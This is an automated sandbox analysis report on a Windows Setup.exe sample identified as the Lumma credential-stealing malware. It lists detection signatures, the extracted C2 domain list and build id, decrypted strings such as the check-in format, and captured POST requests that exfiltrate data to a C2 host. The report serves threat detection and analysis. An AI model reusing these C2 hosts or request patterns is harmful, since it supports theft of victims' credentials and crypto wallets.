Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Setup.exe

Overview

General Information

Sample name:Setup.exe
Analysis ID:1583039
MD5:abda8cea9c2d8bc35847d4d189f61f2e
SHA1:ce38f933a30778130b53792109531056dfe7c03c
SHA256:844b0fdfa66fd6d10179b74ae064c30624581a833bf1eb759e03fd2c664bae03
Tags:exeLummaStealeruser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Detected potential crypto function
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Setup.exe (PID: 6984 cmdline: "C:\Users\user\Desktop\Setup.exe" MD5: ABDA8CEA9C2D8BC35847D4D189F61F2E)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["framekgirus.shop", "tirepublicerj.shop", "noisycuttej.shop", "abruptyopsn.shop", "wholersorie.shop", "nearycrepso.shop", "locketsashayz.click", "cloudewahsj.shop", "rabidcowse.shop"], "Build id": "hRjzG3--TRON"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000002.4139966079.0000000002DA0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
      • 0x4dd79:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
      00000000.00000003.1923253582.00000000014A5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: Setup.exe PID: 6984JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
          Process Memory Space: Setup.exe PID: 6984JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: Setup.exe PID: 6984JoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
              Click to see the 2 entries

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-01T16:56:21.916765+010020283713Unknown Traffic192.168.2.449730188.114.97.3443TCP
              2025-01-01T16:56:23.166077+010020283713Unknown Traffic192.168.2.449731188.114.97.3443TCP
              2025-01-01T16:56:24.615969+010020283713Unknown Traffic192.168.2.449732188.114.97.3443TCP
              2025-01-01T16:56:25.800459+010020283713Unknown Traffic192.168.2.449735188.114.97.3443TCP
              2025-01-01T16:56:31.060448+010020283713Unknown Traffic192.168.2.449740188.114.97.3443TCP
              2025-01-01T16:56:33.202102+010020283713Unknown Traffic192.168.2.449741188.114.97.3443TCP
              2025-01-01T16:56:34.766559+010020283713Unknown Traffic192.168.2.449742188.114.97.3443TCP
              2025-01-01T16:56:36.458976+010020283713Unknown Traffic192.168.2.449743188.114.97.3443TCP
              2025-01-01T16:56:38.632283+010020283713Unknown Traffic192.168.2.449744188.114.97.3443TCP
              2025-01-01T16:56:39.907939+010020283713Unknown Traffic192.168.2.449745185.161.251.21443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-01T16:56:22.676192+010020546531A Network Trojan was detected192.168.2.449730188.114.97.3443TCP
              2025-01-01T16:56:23.640646+010020546531A Network Trojan was detected192.168.2.449731188.114.97.3443TCP
              2025-01-01T16:56:39.103074+010020546531A Network Trojan was detected192.168.2.449744188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-01T16:56:22.676192+010020498361A Network Trojan was detected192.168.2.449730188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-01T16:56:23.640646+010020498121A Network Trojan was detected192.168.2.449731188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-01T16:56:35.522155+010020480941Malware Command and Control Activity Detected192.168.2.449742188.114.97.3443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: https://cegu.shop/Avira URL Cloud: Label: malware
              Source: https://cegu.shop/8574262446/ph.txtksAvira URL Cloud: Label: malware
              Source: https://cegu.shop/QAvira URL Cloud: Label: malware
              Source: https://klipvumisui.shop/int_clp_sha.txt)EAvira URL Cloud: Label: malware
              Source: https://cegu.shop/IAvira URL Cloud: Label: malware
              Source: https://cegu.shop/5Avira URL Cloud: Label: malware
              Found malware configuration
              Source: Setup.exe.6984.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["framekgirus.shop", "tirepublicerj.shop", "noisycuttej.shop", "abruptyopsn.shop", "wholersorie.shop", "nearycrepso.shop", "locketsashayz.click", "cloudewahsj.shop", "rabidcowse.shop"], "Build id": "hRjzG3--TRON"}
              Multi AV Scanner detection for submitted file
              Source: Setup.exeVirustotal: Detection: 8%Perma Link
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 94.9% probability
              Sample uses string decryption to hide its real strings
              Source: 00000000.00000002.4140178253.00000000032A0000.00000004.00001000.00020000.00000000.sdmpString decryptor: cloudewahsj.shop
              Source: 00000000.00000002.4140178253.00000000032A0000.00000004.00001000.00020000.00000000.sdmpString decryptor: rabidcowse.shop
              Source: 00000000.00000002.4140178253.00000000032A0000.00000004.00001000.00020000.00000000.sdmpString decryptor: noisycuttej.shop
              Source: 00000000.00000002.4140178253.00000000032A0000.00000004.00001000.00020000.00000000.sdmpString decryptor: tirepublicerj.shop
              Source: 00000000.00000002.4140178253.00000000032A0000.00000004.00001000.00020000.00000000.sdmpString decryptor: framekgirus.shop
              Source: 00000000.00000002.4140178253.00000000032A0000.00000004.00001000.00020000.00000000.sdmpString decryptor: wholersorie.shop
              Source: 00000000.00000002.4140178253.00000000032A0000.00000004.00001000.00020000.00000000.sdmpString decryptor: abruptyopsn.shop
              Source: 00000000.00000002.4140178253.00000000032A0000.00000004.00001000.00020000.00000000.sdmpString decryptor: nearycrepso.shop
              Source: 00000000.00000002.4140178253.00000000032A0000.00000004.00001000.00020000.00000000.sdmpString decryptor: locketsashayz.click
              Source: 00000000.00000002.4140178253.00000000032A0000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.4140178253.00000000032A0000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.4140178253.00000000032A0000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.4140178253.00000000032A0000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.4140178253.00000000032A0000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.4140178253.00000000032A0000.00000004.00001000.00020000.00000000.sdmpString decryptor: hRjzG3--TRON
              Source: Setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49740 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49741 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49743 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49744 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49745 version: TLS 1.2
              Source: Setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: E:\AWork\_drw_main\DRWIntelligentScan\bin\Release\Win32\EUImgRepair.pdb source: Setup.exe
              Source: Binary string: E:\AWork\_drw_main\DRWIntelligentScan\bin\Release\Win32\EUImgRepair.pdbOO+GCTL source: Setup.exe
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: number of queries: 1001

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49744 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49742 -> 188.114.97.3:443
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: framekgirus.shop
              Source: Malware configuration extractorURLs: tirepublicerj.shop
              Source: Malware configuration extractorURLs: noisycuttej.shop
              Source: Malware configuration extractorURLs: abruptyopsn.shop
              Source: Malware configuration extractorURLs: wholersorie.shop
              Source: Malware configuration extractorURLs: nearycrepso.shop
              Source: Malware configuration extractorURLs: locketsashayz.click
              Source: Malware configuration extractorURLs: cloudewahsj.shop
              Source: Malware configuration extractorURLs: rabidcowse.shop
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 185.161.251.21 185.161.251.21
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 185.161.251.21:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 188.114.97.3:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: locketsashayz.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 78Host: locketsashayz.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GJEOV9UCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18102Host: locketsashayz.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=O6L9KZCKEJV7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8747Host: locketsashayz.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=9MWOJXU86NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20388Host: locketsashayz.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2W9N2HEFM8IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 3779Host: locketsashayz.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=8YUU28F3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1204Host: locketsashayz.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=IALSNE3YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 549614Host: locketsashayz.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 113Host: locketsashayz.click
              Source: global trafficHTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
              Source: global trafficDNS traffic detected: DNS query: locketsashayz.click
              Source: global trafficDNS traffic detected: DNS query: cegu.shop
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: locketsashayz.click
              Source: Setup.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: Setup.exe, 00000000.00000003.1907962979.000000000415A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: Setup.exe, 00000000.00000003.1907962979.000000000415A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: Setup.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
              Source: Setup.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: Setup.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: Setup.exe, 00000000.00000003.1923253582.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944587341.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959265174.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605320460.000000000146C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605662760.00000000014B0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1841101694.000000000146C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
              Source: Setup.exe, 00000000.00000003.1907962979.000000000415A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: Setup.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: Setup.exe, 00000000.00000003.1907962979.000000000415A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: Setup.exe, 00000000.00000003.1907962979.000000000415A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: Setup.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
              Source: Setup.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: Setup.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: Setup.exe, 00000000.00000003.1907962979.000000000415A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: Setup.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
              Source: Setup.exe, 00000000.00000003.1907962979.000000000415A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: Setup.exeString found in binary or memory: http://ocsp.digicert.com0
              Source: Setup.exeString found in binary or memory: http://ocsp.digicert.com0A
              Source: Setup.exeString found in binary or memory: http://ocsp.digicert.com0C
              Source: Setup.exeString found in binary or memory: http://ocsp.digicert.com0X
              Source: Setup.exe, 00000000.00000003.1907962979.000000000415A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: Setup.exeString found in binary or memory: http://www.digicert.com/CPS0
              Source: Setup.exe, 00000000.00000003.1907962979.000000000415A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: Setup.exe, 00000000.00000003.1907962979.000000000415A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: Setup.exe, 00000000.00000003.1841876963.000000000416A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1842191175.0000000004168000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: Setup.exe, 00000000.00000003.1841876963.000000000416A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1842191175.0000000004168000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: Setup.exe, 00000000.00000002.4139858921.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605320460.00000000014B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/
              Source: Setup.exe, 00000000.00000002.4139858921.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605320460.00000000014B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/5
              Source: Setup.exe, 00000000.00000003.2605433978.00000000014D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/8574262446/ph.txt
              Source: Setup.exe, 00000000.00000002.4139858921.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605320460.00000000014B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/8574262446/ph.txtks
              Source: Setup.exe, 00000000.00000002.4139858921.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605320460.00000000014B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/I
              Source: Setup.exe, 00000000.00000002.4139858921.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605320460.00000000014B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/Q
              Source: Setup.exe, 00000000.00000003.1841876963.000000000416A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1842191175.0000000004168000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: Setup.exe, 00000000.00000003.1841876963.000000000416A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1842191175.0000000004168000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: Setup.exe, 00000000.00000002.4139812014.00000000014B6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605320460.000000000146C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4140538030.000000000413A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605662760.00000000014B6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4139549503.0000000001438000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4139721982.0000000001470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compName=
              Source: Setup.exe, 00000000.00000003.1841876963.000000000416A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1842191175.0000000004168000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: Setup.exe, 00000000.00000003.1841876963.000000000416A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1842191175.0000000004168000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: Setup.exe, 00000000.00000003.1841876963.000000000416A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1842191175.0000000004168000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: Setup.exe, 00000000.00000002.4139882734.00000000014CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txt
              Source: Setup.exe, 00000000.00000002.4139882734.00000000014CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txt)E
              Source: Setup.exe, 00000000.00000002.4139549503.0000000001419000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968354239.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959070741.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4139882734.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944815594.00000000014D4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968199543.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944632767.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605903540.00000000014DE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1841101694.000000000146C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959017169.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944383810.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4139903832.00000000014E0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2605433978.00000000014D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://locketsashayz.click/
              Source: Setup.exe, 00000000.00000003.1841101694.000000000146C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://locketsashayz.click/0000Z0o
              Source: Setup.exe, 00000000.00000003.1841101694.000000000146C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://locketsashayz.click/0R
              Source: Setup.exe, 00000000.00000002.4139882734.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968199543.00000000014CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://locketsashayz.click/H
              Source: Setup.exe, 00000000.00000002.4139882734.00000000014CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://locketsashayz.click/M
              Source: Setup.exe, 00000000.00000003.2605433978.00000000014D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://locketsashayz.click/api
              Source: Setup.exe, 00000000.00000003.1923253582.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944815594.00000000014C9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4139882734.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968199543.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959017169.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1944383810.00000000014C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://locketsashayz.click/api.I
              Source: Setup.exe, 00000000.00000002.4139882734.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1968199543.00000000014CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://locketsashayz.click/api9H
